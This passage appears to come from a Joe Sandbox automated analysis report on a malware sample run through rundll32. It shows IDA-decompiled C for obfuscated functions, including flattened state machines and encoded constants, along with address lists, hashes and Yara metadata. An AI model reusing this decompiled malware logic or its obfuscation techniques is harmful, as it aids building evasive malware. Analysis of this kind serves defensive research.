									E002E0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E002E0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E002F0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E002D7FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E002E0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E002F0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E002EC631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E002E0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E002E0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                                  0x002d225a
                                                                                                                                  0x002d2262
                                                                                                                                  0x002d2269
                                                                                                                                  0x002d226b
                                                                                                                                  0x002d2272
                                                                                                                                  0x002d2273
                                                                                                                                  0x002d2274
                                                                                                                                  0x002d2275
                                                                                                                                  0x002d227a
                                                                                                                                  0x002d2282
                                                                                                                                  0x002d2285
                                                                                                                                  0x002d228c
                                                                                                                                  0x002d2294
                                                                                                                                  0x002d2299
                                                                                                                                  0x002d22a7
                                                                                                                                  0x002d22ac
                                                                                                                                  0x002d22b0
                                                                                                                                  0x002d22b5
                                                                                                                                  0x002d22bd
                                                                                                                                  0x002d22c5
                                                                                                                                  0x002d22cd
                                                                                                                                  0x002d22d5
                                                                                                                                  0x002d22dd
                                                                                                                                  0x002d22e5
                                                                                                                                  0x002d22ed
                                                                                                                                  0x002d22f5
                                                                                                                                  0x002d22fd
                                                                                                                                  0x002d230d
                                                                                                                                  0x002d2313
                                                                                                                                  0x002d231b
                                                                                                                                  0x002d2323
                                                                                                                                  0x002d232b
                                                                                                                                  0x002d2330
                                                                                                                                  0x002d2338
                                                                                                                                  0x002d2340
                                                                                                                                  0x002d234c
                                                                                                                                  0x002d2351
                                                                                                                                  0x002d2357
                                                                                                                                  0x002d235f
                                                                                                                                  0x002d236a
                                                                                                                                  0x002d2375
                                                                                                                                  0x002d2380
                                                                                                                                  0x002d2388
                                                                                                                                  0x002d2390
                                                                                                                                  0x002d2398
                                                                                                                                  0x002d23a0
                                                                                                                                  0x002d23a8
                                                                                                                                  0x002d23ad
                                                                                                                                  0x002d23b2
                                                                                                                                  0x002d23ba
                                                                                                                                  0x002d23c7
                                                                                                                                  0x002d23c8
                                                                                                                                  0x002d23d2
                                                                                                                                  0x002d23d6
                                                                                                                                  0x002d23de
                                                                                                                                  0x002d23e6
                                                                                                                                  0x002d23ee
                                                                                                                                  0x002d23f3
                                                                                                                                  0x002d23fd
                                                                                                                                  0x002d2411
                                                                                                                                  0x002d2416
                                                                                                                                  0x002d241f
                                                                                                                                  0x002d242a
                                                                                                                                  0x002d2432
                                                                                                                                  0x002d243f
                                                                                                                                  0x002d2442
                                                                                                                                  0x002d2446
                                                                                                                                  0x002d244e
                                                                                                                                  0x002d2456
                                                                                                                                  0x002d245e
                                                                                                                                  0x002d246e
                                                                                                                                  0x002d2472
                                                                                                                                  0x002d247a
                                                                                                                                  0x002d2485
                                                                                                                                  0x002d2490
                                                                                                                                  0x002d249b
                                                                                                                                  0x002d24a3
                                                                                                                                  0x002d24ab
                                                                                                                                  0x002d24b3
                                                                                                                                  0x002d24c5
                                                                                                                                  0x002d24ca
                                                                                                                                  0x002d24d3
                                                                                                                                  0x002d24de
                                                                                                                                  0x002d24e6
                                                                                                                                  0x002d24eb
                                                                                                                                  0x002d24f3
                                                                                                                                  0x002d2500
                                                                                                                                  0x002d2501
                                                                                                                                  0x002d2505
                                                                                                                                  0x002d250d
                                                                                                                                  0x002d2515
                                                                                                                                  0x002d251d
                                                                                                                                  0x002d2525
                                                                                                                                  0x002d252d
                                                                                                                                  0x002d2532
                                                                                                                                  0x002d2537
                                                                                                                                  0x002d253f
                                                                                                                                  0x002d254c
                                                                                                                                  0x002d2550
                                                                                                                                  0x002d2558
                                                                                                                                  0x002d2560
                                                                                                                                  0x002d2566
                                                                                                                                  0x002d256a
                                                                                                                                  0x002d256f
                                                                                                                                  0x002d2573
                                                                                                                                  0x002d2578
                                                                                                                                  0x002d2580
                                                                                                                                  0x002d258b
                                                                                                                                  0x002d2596
                                                                                                                                  0x002d25a1
                                                                                                                                  0x002d25a9
                                                                                                                                  0x002d25b1
                                                                                                                                  0x002d25b9
                                                                                                                                  0x002d25c1
                                                                                                                                  0x002d25c6
                                                                                                                                  0x002d25cb
                                                                                                                                  0x002d25d3
                                                                                                                                  0x002d25e6
                                                                                                                                  0x002d25ed
                                                                                                                                  0x002d25f8
                                                                                                                                  0x002d2600
                                                                                                                                  0x002d2608
                                                                                                                                  0x002d260d
                                                                                                                                  0x002d2612
                                                                                                                                  0x002d261c
                                                                                                                                  0x002d2635
                                                                                                                                  0x002d263a
                                                                                                                                  0x002d2643
                                                                                                                                  0x002d264e
                                                                                                                                  0x002d2656
                                                                                                                                  0x002d265b
                                                                                                                                  0x002d2660
                                                                                                                                  0x002d2668
                                                                                                                                  0x002d2674
                                                                                                                                  0x002d267c
                                                                                                                                  0x002d2680
                                                                                                                                  0x002d2685
                                                                                                                                  0x002d268d
                                                                                                                                  0x002d2695
                                                                                                                                  0x002d269d
                                                                                                                                  0x002d26aa
                                                                                                                                  0x002d26ae
                                                                                                                                  0x002d26b6
                                                                                                                                  0x002d26be
                                                                                                                                  0x002d26c6
                                                                                                                                  0x002d26d3
                                                                                                                                  0x002d26d7
                                                                                                                                  0x002d26dc
                                                                                                                                  0x002d26e4
                                                                                                                                  0x002d26ef
                                                                                                                                  0x002d26fa
                                                                                                                                  0x002d26fa
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2707
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d270d
                                                                                                                                  0x002d282a
                                                                                                                                  0x002d282f
                                                                                                                                  0x002d2832
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2713
                                                                                                                                  0x002d2719
                                                                                                                                  0x002d2808
                                                                                                                                  0x002d280a
                                                                                                                                  0x002d280d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d271f
                                                                                                                                  0x002d2725
                                                                                                                                  0x002d27f2
                                                                                                                                  0x002d27f7
                                                                                                                                  0x002d27fa
                                                                                                                                  0x00000000
                                                                                                                                  0x002d272b
                                                                                                                                  0x002d2731
                                                                                                                                  0x002d27c0
                                                                                                                                  0x002d27c5
                                                                                                                                  0x002d27c8
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2733
                                                                                                                                  0x002d2739
                                                                                                                                  0x002d278b
                                                                                                                                  0x002d2790
                                                                                                                                  0x002d2793
                                                                                                                                  0x00000000
                                                                                                                                  0x002d273b
                                                                                                                                  0x002d2741
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2747
                                                                                                                                  0x002d2756
                                                                                                                                  0x002d2757
                                                                                                                                  0x002d2758
                                                                                                                                  0x002d275d
                                                                                                                                  0x002d2763
                                                                                                                                  0x002d2769
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2769
                                                                                                                                  0x002d2763
                                                                                                                                  0x002d2741
                                                                                                                                  0x002d2739
                                                                                                                                  0x002d2731
                                                                                                                                  0x002d2725
                                                                                                                                  0x002d2719
                                                                                                                                  0x002d293e
                                                                                                                                  0x002d2940
                                                                                                                                  0x002d2945
                                                                                                                                  0x002d2945
                                                                                                                                  0x002d294f
                                                                                                                                  0x002d294f
                                                                                                                                  0x002d283c
                                                                                                                                  0x002d2842
                                                                                                                                  0x002d28fd
                                                                                                                                  0x002d2902
                                                                                                                                  0x002d2905
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2848
                                                                                                                                  0x002d2848
                                                                                                                                  0x002d284e
                                                                                                                                  0x002d2936
                                                                                                                                  0x002d2854
                                                                                                                                  0x002d2854
                                                                                                                                  0x002d2856
                                                                                                                                  0x002d28d3
                                                                                                                                  0x002d28d6
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2858
                                                                                                                                  0x002d2858
                                                                                                                                  0x002d285e
                                                                                                                                  0x002d28ba
                                                                                                                                  0x002d28bf
                                                                                                                                  0x002d28c2
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2860
                                                                                                                                  0x002d2860
                                                                                                                                  0x002d2866
                                                                                                                                  0x00000000
                                                                                                                                  0x002d286c
                                                                                                                                  0x002d2889
                                                                                                                                  0x002d288e
                                                                                                                                  0x002d2891
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2891
                                                                                                                                  0x002d2866
                                                                                                                                  0x002d285e
                                                                                                                                  0x002d2856
                                                                                                                                  0x002d284e
                                                                                                                                  0x00000000
                                                                                                                                  0x002d290a
                                                                                                                                  0x002d290a
                                                                                                                                  0x002d290a
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                  • API String ID: 0-245365489
                                                                                                                                  • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                  • Instruction ID: 283cbb46493f02c7fb43ef7c775cee4779317ca01b96d86634dc496dda10932a
                                                                                                                                  • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                  • Instruction Fuzzy Hash: 41F14071518380DFD768CF61C58A65BFBF1FBD4348F20891DE29A8A261D7B18958CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D9714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D9714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E002DCDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E002EC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E002D7B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E002D7C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E002E9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E002D46BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E002D219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                                  0x002d9714
                                                                                                                                  0x002d9717
                                                                                                                                  0x002d971c
                                                                                                                                  0x002d9724
                                                                                                                                  0x002d972c
                                                                                                                                  0x002d9734
                                                                                                                                  0x002d973c
                                                                                                                                  0x002d9745
                                                                                                                                  0x002d9749
                                                                                                                                  0x002d974b
                                                                                                                                  0x002d9752
                                                                                                                                  0x002d975a
                                                                                                                                  0x002d975c
                                                                                                                                  0x002d9764
                                                                                                                                  0x002d9769
                                                                                                                                  0x002d9771
                                                                                                                                  0x002d9779
                                                                                                                                  0x002d9781
                                                                                                                                  0x002d9789
                                                                                                                                  0x002d9791
                                                                                                                                  0x002d9799
                                                                                                                                  0x002d97a1
                                                                                                                                  0x002d97a6
                                                                                                                                  0x002d97ae
                                                                                                                                  0x002d97b6
                                                                                                                                  0x002d97be
                                                                                                                                  0x002d97c6
                                                                                                                                  0x002d97ce
                                                                                                                                  0x002d97d6
                                                                                                                                  0x002d97e4
                                                                                                                                  0x002d97e9
                                                                                                                                  0x002d97f4
                                                                                                                                  0x002d97f7
                                                                                                                                  0x002d97fb
                                                                                                                                  0x002d9803
                                                                                                                                  0x002d9813
                                                                                                                                  0x002d981c
                                                                                                                                  0x002d981f
                                                                                                                                  0x002d982b
                                                                                                                                  0x002d982f
                                                                                                                                  0x002d9837
                                                                                                                                  0x002d983f
                                                                                                                                  0x002d9844
                                                                                                                                  0x002d9850
                                                                                                                                  0x002d9853
                                                                                                                                  0x002d9857
                                                                                                                                  0x002d985f
                                                                                                                                  0x002d9867
                                                                                                                                  0x002d986f
                                                                                                                                  0x002d9877
                                                                                                                                  0x002d987f
                                                                                                                                  0x002d9887
                                                                                                                                  0x002d988f
                                                                                                                                  0x002d9897
                                                                                                                                  0x002d989f
                                                                                                                                  0x002d98a7
                                                                                                                                  0x002d98ac
                                                                                                                                  0x002d98b1
                                                                                                                                  0x002d98b9
                                                                                                                                  0x002d98c1
                                                                                                                                  0x002d98c9
                                                                                                                                  0x002d98d3
                                                                                                                                  0x002d98e0
                                                                                                                                  0x002d98e8
                                                                                                                                  0x002d98f0
                                                                                                                                  0x002d98f8
                                                                                                                                  0x002d9907
                                                                                                                                  0x002d990a
                                                                                                                                  0x002d990e
                                                                                                                                  0x002d9916
                                                                                                                                  0x002d9923
                                                                                                                                  0x002d9927
                                                                                                                                  0x002d992f
                                                                                                                                  0x002d9937
                                                                                                                                  0x002d993f
                                                                                                                                  0x002d9947
                                                                                                                                  0x002d994f
                                                                                                                                  0x002d9957
                                                                                                                                  0x002d995f
                                                                                                                                  0x002d9967
                                                                                                                                  0x002d996f
                                                                                                                                  0x002d997f
                                                                                                                                  0x002d9983
                                                                                                                                  0x002d998b
                                                                                                                                  0x002d9993
                                                                                                                                  0x002d999b
                                                                                                                                  0x002d99a7
                                                                                                                                  0x002d99ac
                                                                                                                                  0x002d99b2
                                                                                                                                  0x002d99ba
                                                                                                                                  0x002d99c2
                                                                                                                                  0x002d99ce
                                                                                                                                  0x002d99d1
                                                                                                                                  0x002d99d5
                                                                                                                                  0x002d99dd
                                                                                                                                  0x002d99ea
                                                                                                                                  0x002d99ee
                                                                                                                                  0x002d99f6
                                                                                                                                  0x002d99fe
                                                                                                                                  0x002d9a06
                                                                                                                                  0x002d9a0e
                                                                                                                                  0x002d9a13
                                                                                                                                  0x002d9a18
                                                                                                                                  0x002d9a20
                                                                                                                                  0x002d9a28
                                                                                                                                  0x002d9a30
                                                                                                                                  0x002d9a38
                                                                                                                                  0x002d9a40
                                                                                                                                  0x002d9a48
                                                                                                                                  0x002d9a4d
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a5a
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9a5a
                                                                                                                                  0x002d9a6c
                                                                                                                                  0x002d9b32
                                                                                                                                  0x002d9b36
                                                                                                                                  0x002d9b3b
                                                                                                                                  0x002d9b3e
                                                                                                                                  0x002d9b41
                                                                                                                                  0x002d9b45
                                                                                                                                  0x002d9b4a
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9b4a
                                                                                                                                  0x002d9a78
                                                                                                                                  0x002d9ac5
                                                                                                                                  0x002d9ad8
                                                                                                                                  0x002d9add
                                                                                                                                  0x002d9ae0
                                                                                                                                  0x002d9ae3
                                                                                                                                  0x002d9ae5
                                                                                                                                  0x002d9afd
                                                                                                                                  0x002d9b02
                                                                                                                                  0x002d9b05
                                                                                                                                  0x002d9b09
                                                                                                                                  0x002d9b11
                                                                                                                                  0x002d9b15
                                                                                                                                  0x002d9b1a
                                                                                                                                  0x002d9b1d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9b1d
                                                                                                                                  0x002d9a7a
                                                                                                                                  0x002d9a7c
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9b7a
                                                                                                                                  0x002d9a84
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9a8a
                                                                                                                                  0x002d9aae
                                                                                                                                  0x002d9ab3
                                                                                                                                  0x002d9ab6
                                                                                                                                  0x002d9abb
                                                                                                                                  0x002d9ac1
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a55
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9a55
                                                                                                                                  0x002d9abb
                                                                                                                                  0x002d9a84
                                                                                                                                  0x002d9b82
                                                                                                                                  0x002d9b82
                                                                                                                                  0x002d9b52
                                                                                                                                  0x002d9b57
                                                                                                                                  0x002d9b57
                                                                                                                                  0x002d9b57
                                                                                                                                  0x00000000
                                                                                                                                  0x002d9a5a

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                  • API String ID: 0-1622084174
                                                                                                                                  • Opcode ID: 996c152d7e78cd185da3708c2b3c1cf4f07f1b27b5ba4c4fbb5efb1dc0b2e430
                                                                                                                                  • Instruction ID: 03bd2238df6a9160eca131d05f1e83b01ddc727d2e85b822597411cb942a4122
                                                                                                                                  • Opcode Fuzzy Hash: 996c152d7e78cd185da3708c2b3c1cf4f07f1b27b5ba4c4fbb5efb1dc0b2e430
                                                                                                                                  • Instruction Fuzzy Hash: 59B130725183419FC398CF25C58A40BFBE1FBC4758F50891EF59A96220D3B5D969CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D64E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D64E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
